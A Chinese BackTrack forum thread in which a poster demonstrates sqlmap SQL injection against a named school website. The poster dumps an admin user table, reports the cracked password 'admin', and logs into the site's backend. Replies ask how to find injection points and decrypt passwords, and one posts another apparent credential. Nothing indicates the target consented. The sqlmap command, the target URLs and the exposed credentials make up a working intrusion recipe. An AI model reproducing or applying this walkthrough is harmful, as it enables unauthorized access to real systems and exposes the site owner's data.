最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 2945|回复: 8

[教程] 小白亲测sqlmap 注入实例

[复制链接]
鹤家
吕水风
自己扫描注入点,我用wvs扫描的,注入点:http://www.ssyschool.com/jyzdshow.asp?id=71
结果为:
C{{7MM@7C2FZF(NW{K7X)65.png
可以看到操作系统和数据库。
用的是Access数据库。
爆表:
结果:
$$%@48IR6XTQ8[[{[)4%_V5.png
获取adminuser表的字段:
结果:
N2ZP_%))E3FEJG{(KNQN2MF.png
获取namepasswordusername的内容
Sqlmap u Sqlmap u http://www.ssyschool.com/jyzdshow.asp?id=71 --dump T adminuser C name,password,username
结果为:
_G2)M56AN)3FN2]E$~TU.png

用户ssy的密码可以解密,密码为admin
用户admin的密码暂时没有解密出来。
从wvs的扫描结果上可以看到后台的登录链接为:http://www.ssyschool.com/system/index.asp
用ssy登录
4L}@Z`DOWI~Z%OU79219FLY.jpg

+1
2954°C
8
  • xczc10
  • xczc10
  • conosc
  • 繁蕊冉月
  • Kuma
过: 他们
彦月
驰骞
wvs扫描网站之后在哪里看注入点呢? 请告诉步骤呢  谢谢
索夜柳
毓叶彤
找不到像这样的:http://www.ssyschool.com/jyzdshow.asp?id=71链接呢  求指教
真夏真
水问风
admin,admin2015
琬冰
栀婷
请问Password那列是怎么解密的。。。。。。。。。。。。。
叔晗蕾
卫骋然
关于access数据库检测提示 --tamper,现在无法检测这个网站了
弓筠溪
宿和玉
提示: 作者被禁止或删除 内容自动屏蔽
臧修美
禄雅逸
1111111111111111111111111111
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表